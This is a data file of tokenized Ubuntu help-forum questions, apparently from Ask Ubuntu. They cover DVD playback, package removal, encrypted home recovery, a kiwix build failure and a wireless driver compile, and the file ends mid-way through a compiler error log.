229563	ubuntu 12.04 will not play dvds	first off , i 'm not just a newbie , i 'm clueless ! so your answers will need to be in complete idiot language ( let 's say i 'm computer savvy , and i can follow directions , but i 've never programmed anything and assume i do n't understand any abbreviations . so why am i running linux ? because windows was driving me nuts and my friend managed to convince me . day-to-day operations , we 're doing fine , but when it comes to problems , i 've got no clue what i 'm doing ! ) so here 's what 's going on , my machine is an hp pavilion dv6 , my optical drive is a standard cd/dvdrw , when i load an audio cd of any type ( burned , official , etc , .. ) i have no problems , when i pop in a dvd - i get nothing . the dvd icon comes up in my launch tray , when i open vlc player i can find the dvd in the folder ... but it wo n't play . i can watch movies i 've downloaded with no problem , i can also watch movies off an external hard drive . the only thing i 've tried is removing vlc and reinstalling , and i tried installing a different player ( gnome maybe ? i do n't remember ) . however , none of them work . again , i can follow directions , but you need to be very specific and do n't assume i know anything going in . ( i mean , i know basic stuff , but nothing too technical . ) please help ! ! ! my kids are driving me crazy ! ! ! thanks ! !
229567	does youtube playlists roll on when suspended	i fell asleep last night while watching a youtube video . i woke up for a second just to see a black screen which i closed . upon awakening i lifted the laptop screen ( totally addicted to it ) and heard voices before logging in . so does youtube playlists roll on when ubuntu is suspended or did it just start over from where it suspended ? have i been downloading all night or ... ? ? ?
229570	how to embedded terminal in desktop background ?	how to embedded terminal in desktop background like heare : ?
229572	how do i test if a windows share exists and is ready to be mounted ?	how do i test if a windows share exists before i attempt to mount the share ? regards hendre
229575	battery life extender for linux	i have lenovo notebook . there is an utility for windows called kind of battery extender which extends battery life because it does n't allow the battery be charged more than 50 % . it 's developed by lenovo . since there is no that official utility for ubuntu on lenovo web site , do you know any one which is similar to it ?
229578	low resolution wo n't strech to fullscreen	so it happen that i have a netbook with ubuntu 12.10 installed . my netbook 's resolution is 1024x600 so for example i run a game which has 800x600 resolution supported but not my native one so when i apply that resolution i see black bars appearing on both sides of the screen . why doesnt it strech to fill up the screen ? i noticed that when i am connected to an external moniter through a vga port and do the same there it streches to fill up the whole screen so is there any solution to this ?
229579	postgresql 8.2 service will not stop and uninstall	my system config is as follows : system ( running on amazon ec2 ) ubuntu 10.04 postgresql-8.2 installed and it is working . ubuntu @ ip : ~ $ sudo /etc/init.d/postgresql-8.2 status : running clusters : 8.2/main when i try to shutdown the server , i get the error : ubuntu @ ip : ~ $ sudo /etc/init.d/postgresql-8.2 stop * stopping postgresql 8.2 database server * insecure directory in $ env { path } while running with -t switch at /usr/bin/pg_ctlcluster line 63 . [ fail ] because of the above problem i am unable to do a clean uninstall of postgresql . any suggestion on how to fix this problem ? i have tried the following : sudo apt-get autoremove postgresql-8.2 sudo apt-get -f install sudo apt-get purge postgresql-* none of them resolved the problem . thanks in advance
229581	no android sdk , neither java found	i have java installed correctly , i did it by the manual http : //www.wikihow.com/install-oracle-java-on-ubuntu-linux i also installed android sdk . however when i try to create a new project intellij idea 12 and specify project sdk choosing new - > /home/alex/android-sdk-linux , it says me no java sdk of appropriate version found . in addition to the android sdk , you need to define a jsdk 1.5 , 1.6 or 1.7 what did i miss ?
229582	best is the best format to store videos ?	i download and import videos from various website and devices . i also view them on various devices requiring different formats . i want to convert my videos into a single base format , then convert them from there to the various formats required for viewing . hendre
229584	is gnome-session-fallback getting updates ?	i am using gnome-session-fallback , which fairly resembles gnome2 . i typed the gnome-session -- version command and here is the output : $ gnome-session -- version gnome-session 3.6.0 my question is : does that mean that it will get updates and bug fixes in the future or is the fallback session old and obsolete technology ?
229587	web site takes long load time to load after upgrade to 12.10	after i upgraded to ubuntu 12.10 , my browsers take long time ( more than 15 sec . ) for opening web sites or some times they do n't open completely . but when site is opened once , the second time i open it loads faster . here is the video .
229589	how to make a file ( e.g . a .sh script ) executable , so it can be ran from terminal	i have a script.sh file and type of this file is shellscript file . i want to make this file as application/x-executable file . how can i make it ?
229595	evolution : work week print layout only prints 5-days and not 7-days	some of us work 7 days ( well , we like to 'map out ' out week 7 days ) and not 5 days . i used to like ms outlook ( pre vista ) for being able to print out my planned forthcoming 7 days scheduled week and throw a printed copy on my office door . now i 've moved 100 % ubuntu i like using evolution as it is a 'close ' clone to ms outlook and really does everything i need . i do n't really want to move/change to another diary application , and do n't really want add any external functionality ( google apps etc ) . when i come to print out the 'work week ' in evolution , my 7-day screen view only appears as a 5-day view , pretty annoying and from all the prefs , i can not find a way to print out 7-day view other than an alternative work week view , which simply does n't show the days in detail . is this an app design fault , an omission , or something that ca n't be done in evo 3.6x compared to ms outlook ( ala pre vista ) or something i 'm missing as a whole , as i can not find any templates etc to meet my needs ? fyi , i 'm on ubuntu 12.10 with evo 3.6x . comments on how/if it can be changed . thanks .
229598	is the ubuntu kernel 100 % free software ?	i got curious today , and ran vrms to check which non-free packages i had . to my great surprise , no kernel packages appeared . it used to be the case that the kernel contained some small non-free bits ( like firmware ) that made the package unfree . i am wondering , now , if vrms is lying , or if all the non-free bits are out of the package
229604	ecryptfs problems after inapproriate shut down - unable to access my /home folder ?	here is what happened to me a few days ago . i was watching a movie in bed and when i turned i accidently pulled the electric plug from my pc and it turned off inappropriately . when i turned it back on , it took forever trying to fix a major error , it did n't manage to fix it , i ignored the errors . it kept loading and i got to the ubuntu login page . i entered my password and pressed enter , the screen went black and when it came back , i was where i had been : the login page asking me to enter my password again . it is stuck in a loop , every time i write my password it goes back to asking me my password . i ca n't access my session . from the guest session , i tried to access my home , i was able to using console ctrl+alt+f1 . using the ls -al command , i found that my /home/ was empty except for a few folders . the present folders are : .cache .ecryptfs .face .private readme.txt i suspected that through the hard shut down the ecryptfs got corrupted and is preventing me from accessing my encrypted files . i ca n't remember if i had configured a passphrase and if i did , i do n't remember what it is . of course i remember my login password . at this point , i want to either retrieve my data and then i will format and reinstall or simply have the ecryptfs corrupt files fixed and avoid formatting anything . i can provide you with any additional information if you need it to help me .
229605	how to use ubuntu desktop as a mail server ?	i 'm a open source web developer and i 'm just using ubuntu 11.10 x64 desktop version as my web server by installing php mysql and apache 2 . i mainly use php to send email from my web server . but i wish to receive and store message from others or from my coding via internet.so , i wish to know how to use ubuntu as my mail server ? please reply me ... thank all geeks .
229608	line 63 error message	hi my update manager is not working . each time i open it there is an error messages that says e ; type 'reading ' is not known on line 63 in source list/etc/apt/source.list . as a new user to linux how can i fix this problem . i use ubuntu 10.10 maverick meerkat
229617	installing ubuntu 12.04 using wi-fi dongle	i keep getting connection problems when trying to install ubuntu 12.04 as i use a usb network dongle.i have tried all possible solutions given but i can not establish a connection to go further on with the installation . is there a way out of this problem ?
229618	generate a diff between current /etc/ and default configuration	after installation and various custom configurations , is it possible to use eg . apt and some shell-fu to produce a diff for every file in /etc/ that differs from the standard configuration ? this would provide a means to generate a short summary of the configuration state after the fact , rather than having to rely on manual logging along the way , should one desire to remember what was changed at a later time .
229625	lubuntu - what task switchers with previews can i install ?	i 'm looking for a more contemporary task switcher for lxde . i find the gnome one to be a perfect one . i also like tiled windows preview like what is presented in gnome shell activities . i take the necessity of compositor installation into account .
229627	ubuntu 12.10 wo n't boot after install	i recently wiped my hard disk and tried to install ubuntu 12.10 but after a sucessful install from the usb , i booted from the hd and when i do i get a purple screen saying ubuntu and a loading animation but that 's all it does , it keeps loading and loading an i ca n't get to the login screen ... i 'm used ext2 as the /boot and btrfs as /..i do n't know if that would affect this but i did it because it kept failing to create a ext4 partition ... .please help !
229628	how can i get shockwave flash to work on ubuntu 12.04	i 've tried most of the things suggested on this site and others so far . it 's kind of frustrating because this is a home computer and i mainly use it for browsing the internet and watching youtube videos . when i try to install something that might fix it , it just downloads a bunch of files and says to extract them or whatever . i 'm not sure what to do with the files after i extract them . that 's probably the main issue : i do n't have a lot of experience working with computers at this level . i 'm used to windows , which seems to make most software installs idiot-proof . any suggestions are appreciated ! !
229634	where to keep common data like movies etc . between users ?	say a pc is shared among many users and everybody keeps personal data in their home directories but say a user downloaded a movie he keeps at a location where everybody else can also enjoy it.another user downloads some songs and also wants everybody else to listen . is there a standard directory for this purpose ?
229635	ubuntu 12.04 on vm player showing wired network instead of wireless network	i am new to ubuntu , recently i installed ubuntu 12.04 in vm player ( virtual machine ) on my dell laptop having windows 7 ultimate 32 bit for just to check the security of my wireless network and want to crack the wifi ( wpa-psk ) password but in ubuntu it does not show the wireless network it shows the 2 arrow sign as i have not connect the ethernet cable to my laptop and connected through wifi on my main os ( windows 7 ) but it shows the wired network and internet is working but it does not show wifi connection . on windows 7 wifi is connected and showing the wifi connection and working correctly.but my main motive is to crack the wifi password as it ca n't detect wifi network so what to do ? please help. ! ! thanks my laptop specification : laptop : dell latitude d620 os : windows 7 ultimate 32 bit processor : core duo 2 t7200 @ 2ghz ram : 2 gb wifi card : intel pro/wireless 3945 abg virtual machine : vm player v 5.0.1 if need to install drivers please give me full information how to install and which driver i should install . thanks in advance .
229637	how do i use a 4gb usb flash drive to install ubuntu 12.10 ?	i 've downloaded `` ubuntu-12.10-desktop-amd64 '' and used pen drive linux to get it onto my usb . i then restarted my computer ( a windows 7 home premium edition ) and entered the boot menu to have it boot from the sandisk usb ( it called it sandisk cruzer cruzer ) . linux came up and asked if i wanted to try or install . i picked install , connected to my wi-fi , and installed it . after my laptop restarted , windows booted immediately . i have tried several times and can not get a choice between the two . p.s . i have used the windows installer , wubi , but at the last second it gave me some kind of error .
229639	how can i get wine to work on my amd64 computer ?	i am new to ubuntu , and want to install wine on my laptop . however , there only seem to be 32-bit packages . could anyone tell me how to get wine running ? although i am new to linux , i am fairly tech-savvy - i want to use notepad++ in wine to edit my website - and no i do n't want to use gedit or any other editor !
229640	create log file just for ssh	i use ubuntu 10.04 , contained ssh . i want to create a log file that stores all the activity on ssh ( only ssh ) . like in /var/log/auth.log but only for ssh . like /var/log/ssh.log . so , file ssh.log will saving all records of the client when using ssh to a remote server .
229653	why there are tons of softwares on `` synaptic package manager '' when there are only few softwares on `` ubuntu software center '' ?	i was just searching some softwares on ubuntu software center and it was giving me `` not found '' but i could easily find and install them on synaptic .
229654	unable to find a medium containing a live file system with boot from iso	unable to find a medium containing a live file system : reset/press shift/c ( command line ) grub > insmod iso9660 grub > loopback l ( hd0,6 ) /lubuntu-12.10-desktop-i386.iso grub > set root= ( l ) grub > source ( l ) /boot/grub/loopback.cfg grub > [ press esc ] select install lubuntu ... ... ( initramfs ) unable to find a medium containing a live file system ( initramfs )
229659	where is the full circle magazine installed by the ubuntu software center ?	after clicking the buy button in the usc , i do n't get anything . browsing to a couple of issues in the usc , i see that i 've already downloaded them , but there is n't anything showing up when i search . where did ubuntu software center install the issues on my system ?
229660	how do i disable microphone automatic correction ?	i have one nasty problem . when i use skype , my mic corrects himself alone . can someone help me ?
229664	how to get nexus mod manager working on wine ?	i 'm trying to get nexus mod manager ( beta yet ) working on wine , but after the configuration of nmm it crashes with an error . during the startup it spams a lot of terminal stuff and at the end i find this error : # # # ! ! ! abort : main-thread-only object used off the main thread : file /build/wine-mozilla-1.8/xpcom/base/nscyclecollector.cpp , line 1166 # # # ! ! ! abort : main-thread-only object used off the main thread : file /build/wine-mozilla-1.8/xpcom/base/nscyclecollector.cpp , line 1166 maximum number of clients reachederr : winediag : x11drv_init_thread_data x11drv : ca n't open display : :0 . please ensure that your x server is running and that $ display is set correctly . any suggestions ?
229665	how to use unused space in ubuntu	i installed ubuntu on my machine with only 80 gb of memory anticipating that i will remove it later but now i want to keep it forever ( until i am frustrated with linux ) . i have 500 gb in my machine and now i want to use that raw 420 gb of space . how i can i do that ? with `` space/memory '' i am referring to secondary memory not ram . here is output of : sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000dcb77 device boot start end blocks id system /dev/sda1 * 2048 136718335 68358144 83 linux
229668	package libxul not fount - kiwix wikpedia in ubuntu precise 12.04	i 'm trying to install the service kiwix but i need a library that is not available for ubuntu 12.04 lts precise leave the log and if someone could tell me how to install seller would appreciate . kiwix-0.9 # ls aclocal.m4 compile config.sub copying install-sh ltmain.sh missing static authors config.guess configure depcomp kiwix makefile.am readme changelog config.log configure.ac desktop libxul-dev_1.8.1.16+nobinonly-0ubuntu1_all.deb makefile.in src kiwix-0.9 # ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking for g++ ... g++ checking for cl ... no checking for cl ... no checking for xcode ... no checking for jar ... jar checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for ar ... ar checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking how to run the c preprocessor ... gcc -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking whether we are using the gnu c++ compiler ... ( cached ) yes checking whether g++ accepts -g ... ( cached ) yes checking dependency style of g++ ... ( cached ) gcc3 checking how to run the c++ preprocessor ... g++ -e checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... yes checking for ld used by g++ ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking whether the g++ linker ( /usr/bin/ld ) supports shared libraries ... yes checking for g++ option to produce pic ... -fpic -dpic checking if g++ pic flag -fpic -dpic works ... yes checking if g++ static flag -static works ... yes checking if g++ supports -c -o file.o ... yes checking if g++ supports -c -o file.o ... ( cached ) yes checking whether the g++ linker ( /usr/bin/ld ) supports shared libraries ... yes checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking for ranlib ... ( cached ) ranlib checking whether make sets $ ( make ) ... ( cached ) yes checking for pkg-config ... pkg-config checking for perl ... perl checking fcntl.h usability ... yes checking fcntl.h presence ... yes checking for fcntl.h ... yes checking float.h usability ... yes checking float.h presence ... yes checking for float.h ... yes checking libintl.h usability ... yes checking libintl.h presence ... yes checking for libintl.h ... yes checking limits.h usability ... yes checking limits.h presence ... yes checking for limits.h ... yes checking stddef.h usability ... yes checking stddef.h presence ... yes checking for stddef.h ... yes checking for stdint.h ... ( cached ) yes checking for stdlib.h ... ( cached ) yes checking for string.h ... ( cached ) yes checking for strings.h ... ( cached ) yes checking sys/socket.h usability ... yes checking sys/socket.h presence ... yes checking for sys/socket.h ... yes checking sys/time.h usability ... yes checking sys/time.h presence ... yes checking for sys/time.h ... yes checking for unistd.h ... ( cached ) yes checking wchar.h usability ... yes checking wchar.h presence ... yes checking for wchar.h ... yes checking for stdbool.h that conforms to c99 ... yes checking for _bool ... no checking for inline ... inline checking for int16_t ... yes checking for int32_t ... yes checking for int64_t ... yes checking for int8_t ... yes checking for off_t ... yes checking for pid_t ... yes checking for size_t ... yes checking for uint16_t ... yes checking for uint32_t ... yes checking for uint64_t ... yes checking for uint8_t ... yes checking for ptrdiff_t ... yes checking vfork.h usability ... no checking vfork.h presence ... no checking for vfork.h ... no checking for fork ... yes checking for vfork ... yes checking for working fork ... yes checking for working vfork ... ( cached ) yes checking for stdlib.h ... ( cached ) yes checking for gnu libc compatible malloc ... yes checking for working strtod ... yes checking for getcwd ... yes checking for gettimeofday ... yes checking for memmove ... yes checking for memset ... yes checking for pow ... yes checking for regcomp ... yes checking for sqrt ... yes checking for strcasecmp ... yes checking for strchr ... yes checking for strdup ... yes checking for strerror ... yes checking for strtol ... yes package libxul was not found in the pkg-config search path . perhaps you should add the directory containing `libxul.pc' to the pkg_config_path environment variable no package 'libxul ' found package libxul was not found in the pkg-config search path . perhaps you should add the directory containing `libxul.pc' to the pkg_config_path environment variable no package 'libxul ' found checking for /stable ... no checking for `` /nsisupports.idl '' ... no configure : error : unable to find nsisupports.idl kiwix-0.9 # apt-get install libxul leyendo lista de paquetes ... hecho creando 谩rbol de dependencias leyendo la informaci贸n de estado ... hecho e : no se ha podido localizar el paquete libxul
229670	what should the correct path be for my cd/dvd drive in 12.04 and how do i change it ?	after a fresh install of 12.04 on a dell inspiron 530 when right clicking on the cd/dvd drive and selecting properties it indicates for location : `` /// '' obviously this drive does not work . whats the best fix for newb ? please do n't go cryptic on me give me a long shot answer . much thanks in advance .
229676	search on 'open ' dialog is out-of-date	if i have saved a file recently ( or even on the last couple of days ) , it does not show up on searches on that `` open dialog '' some programs have ( the `` open dialog of programs '' is the following . it appears on libreoffice and on firefox ) i am wondering why this search is not up-to-date : what is the infrastructure behind this search ? does it update some sort of index from time to time ? how could i configure it to do so more frequently ?
229678	ca n't make awus036h work in ubuntu 12.10	i am using 64 bit ubuntu 12.10 . this is my kernel version : linux 3.5.0-19-generic # 30-ubuntu smp tue nov 13 17:48:01 utc 2012 x86_64 x86_64 x86_64 gnu/linux my wireless card is an awusu36h the first thing i do to install the driver is copy the driver from the cd to the downloads folder . cd /media/me/awus036h/drivers/rtl8187l/unix ( linux ) /linux driver for kernel 2.6.x $ cp rtl8187_linux_26.1025.0328.2007.tar.gz ~/downloads/ then i extract the tar tar xvfz rtl8187_linux_26.1025.0328.2007.tar.gz i navigate into the extracted folder , and i try to follow the instructions in the readme.txt cd rtl8187_linux_26.1025.0328.2007 this are the contents of the folder : drv.tar.gz makedrv stack.tar.gz wlan0rmv ieee80211 readme.txt wlan0dhcp wlan0up ifcfg-wlan0 rtl8187 wlan0down wpa_supplicant-0.4.9 this is what the readme.txt says : release date : 2006-02-09 , ver 1.2^m rtl8187 linux driver version 1.2^m ^m -- this driver supports realtek rtl8187 wireless lan driver for ^m fedora core 2/3/4/5 , debian 3.1 , mandrake 10.2/mandriva 2006 , ^m suse 9.3/10.1/10.2 , gentoo 3.1 , etc.^m - support client mode for either infrastructure or adhoc mode^m - support wep and wpapsk connection^m ^m < component > ^m the driver is composed of several parts : ^m 1 . module source code^m stack.tar.gz^m drv.tar.gz^m ^m 2 . script ot build the modules^m makedrv^m ^m 3 . script to load/unload modules^m wlan0up^m wlan0down ^m ^m 4 . script and configuration for dhcp^m '' readme.txt '' [ readonly ] 140 lines , 4590 characters so what i do know is extract both of the compressed files : sudo tar xvfz drv.tar.gz sudo tar xvfz stack.tar.gz this 2 commands will add some data to the folders ieee80211 and rtl8187 at this point i get lost , and i do n't know what to do . if i go in each of this 2 folders and i run the sudo make command then i get errors like this one : sudo makemake -c /lib/modules/3.5.0-19-generic/build m=/home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-19-generic' cc [ m ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/r8187_core.o in file included from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/r8187_core.c:64:0 : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/r8187.h:29:26 : fatal error : linux/config.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/r8187_core.o ] error 1 make [ 1 ] : *** [ _module_/home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-19-generic' make : *** [ modules ] error 2 if i try to run any of the script ./makedrv that the instructions describe , then i also get an error : ~/downloads/rtl8187_linux_26.1025.0328.2007 $ sudo ./makedrv [ sudo ] password for me : ieee80211/ ieee80211/license ieee80211/ieee80211_crypt.c ieee80211/ieee80211_tx.c ieee80211/ieee80211_softmac.c ieee80211/ieee80211_softmac_wx.c ieee80211/ieee80211_module.c ieee80211/ieee80211_crypt_ccmp.c ieee80211/ieee80211_rx.c ieee80211/tags ieee80211/ieee80211_crypt_tkip.c ieee80211/makefile ieee80211/readme ieee80211/.tmp_versions/ ieee80211/.tmp_versions/ieee80211-rtl.mod ieee80211/.tmp_versions/ieee80211_crypt_wep-rtl.mod ieee80211/.tmp_versions/ieee80211_crypt_tkip-rtl.mod ieee80211/.tmp_versions/ieee80211_crypt-rtl.mod ieee80211/.tmp_versions/ieee80211_crypt_ccmp-rtl.mod ieee80211/ieee80211_crypt_wep.c ieee80211/ieee80211.h ieee80211/ieee80211_wx.c ieee80211/ieee80211_crypt.h rtl8187/ rtl8187/license rtl8187/r8180_rtl8225z2.c rtl8187/r8180_rtl8225.h rtl8187/r8187_led.c rtl8187/r8180_93cx6.h rtl8187/r8180_wx.h rtl8187/r8180_hw.h rtl8187/copying rtl8187/r8187_led.h rtl8187/r8180_pm.h rtl8187/tags rtl8187/r8187.h rtl8187/makefile rtl8187/r8180_rtl8225.c rtl8187/readme rtl8187/install rtl8187/.tmp_versions/ rtl8187/.tmp_versions/r8187.mod rtl8187/changes rtl8187/r8180_wx.c rtl8187/r8180_pm.c rtl8187/r8187_core.c rtl8187/r8180_93cx6.c rtl8187/authors rtl8187/ieee80211.h rtl8187/ieee80211_crypt.h rm -f *.mod.c *.mod *.o . *.cmd *.ko *~ rm -rf /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/tmp make -c /lib/modules/3.5.0-19-generic/build m=/home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-19-generic' cc [ m ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.o in file included from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:17:0 : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211.h:1019:24 : error : field ‘ps_task’ has incomplete type /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_softmac_scan_wq’ : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:421:2 : warning : passing argument 2 of ‘queue_delayed_work’ from incompatible pointer type [ enabled by default ] in file included from include/linux/srcu.h:32:0 , from include/linux/notifier.h:15 , from /usr/src/linux-headers-3.5.0-19-generic/arch/x86/include/asm/uprobes.h:26 , from include/linux/uprobes.h:35 , from include/linux/mm_types.h:15 , from include/linux/kmemcheck.h:4 , from include/linux/skbuff.h:18 , from include/linux/if_ether.h:134 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211.h:26 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:17 : include/linux/workqueue.h:371:12 : note : expected ‘struct delayed_work *’ but argument is of type ‘struct work_struct *’ /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_softmac_stop_scan’ : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:495:3 : warning : passing argument 1 of ‘cancel_delayed_work’ from incompatible pointer type [ enabled by default ] in file included from include/linux/srcu.h:32:0 , from include/linux/notifier.h:15 , from /usr/src/linux-headers-3.5.0-19-generic/arch/x86/include/asm/uprobes.h:26 , from include/linux/uprobes.h:35 , from include/linux/mm_types.h:15 , from include/linux/kmemcheck.h:4 , from include/linux/skbuff.h:18 , from include/linux/if_ether.h:134 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211.h:26 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:17 : include/linux/workqueue.h:410:20 : note : expected ‘struct delayed_work *’ but argument is of type ‘struct work_struct *’ /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_associate_abort’ : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:915:2 : warning : passing argument 2 of ‘queue_delayed_work’ from incompatible pointer type [ enabled by default ] in file included from include/linux/srcu.h:32:0 , from include/linux/notifier.h:15 , from /usr/src/linux-headers-3.5.0-19-generic/arch/x86/include/asm/uprobes.h:26 , from include/linux/uprobes.h:35 , from include/linux/mm_types.h:15 , from include/linux/kmemcheck.h:4 , from include/linux/skbuff.h:18 , from include/linux/if_ether.h:134 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211.h:26 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:17 : include/linux/workqueue.h:371:12 : note : expected ‘struct delayed_work *’ but argument is of type ‘struct work_struct *’ /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_rx_frame_softmac’ : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:1527:3 : error : implicit declaration of function ‘tasklet_schedule’ [ -werror=implicit-function-declaration ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_stop_protocol_rtl’ : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2120:2 : warning : passing argument 1 of ‘cancel_delayed_work’ from incompatible pointer type [ enabled by default ] in file included from include/linux/srcu.h:32:0 , from include/linux/notifier.h:15 , from /usr/src/linux-headers-3.5.0-19-generic/arch/x86/include/asm/uprobes.h:26 , from include/linux/uprobes.h:35 , from include/linux/mm_types.h:15 , from include/linux/kmemcheck.h:4 , from include/linux/skbuff.h:18 , from include/linux/if_ether.h:134 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211.h:26 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:17 : include/linux/workqueue.h:410:20 : note : expected ‘struct delayed_work *’ but argument is of type ‘struct work_struct *’ /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_softmac_init’ : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2229:78 : error : macro `` init_work '' passed 3 arguments , but takes just 2 /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2229:2 : error : ‘init_work’ undeclared ( first use in this function ) /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2229:2 : note : each undeclared identifier is reported only once for each function it appears in /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2230:88 : error : macro `` init_work '' passed 3 arguments , but takes just 2 /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2231:94 : error : macro `` init_work '' passed 3 arguments , but takes just 2 /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2232:96 : error : macro `` init_work '' passed 3 arguments , but takes just 2 /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2233:82 : error : macro `` init_work '' passed 3 arguments , but takes just 2 /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2234:82 : error : macro `` init_work '' passed 3 arguments , but takes just 2 /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2244:2 : error : implicit declaration of function ‘tasklet_init’ [ -werror=implicit-function-declaration ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_softmac_free’ : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2255:2 : warning : passing argument 1 of ‘cancel_delayed_work’ from incompatible pointer type [ enabled by default ] in file included from include/linux/srcu.h:32:0 , from include/linux/notifier.h:15 , from /usr/src/linux-headers-3.5.0-19-generic/arch/x86/include/asm/uprobes.h:26 , from include/linux/uprobes.h:35 , from include/linux/mm_types.h:15 , from include/linux/kmemcheck.h:4 , from include/linux/skbuff.h:18 , from include/linux/if_ether.h:134 , from 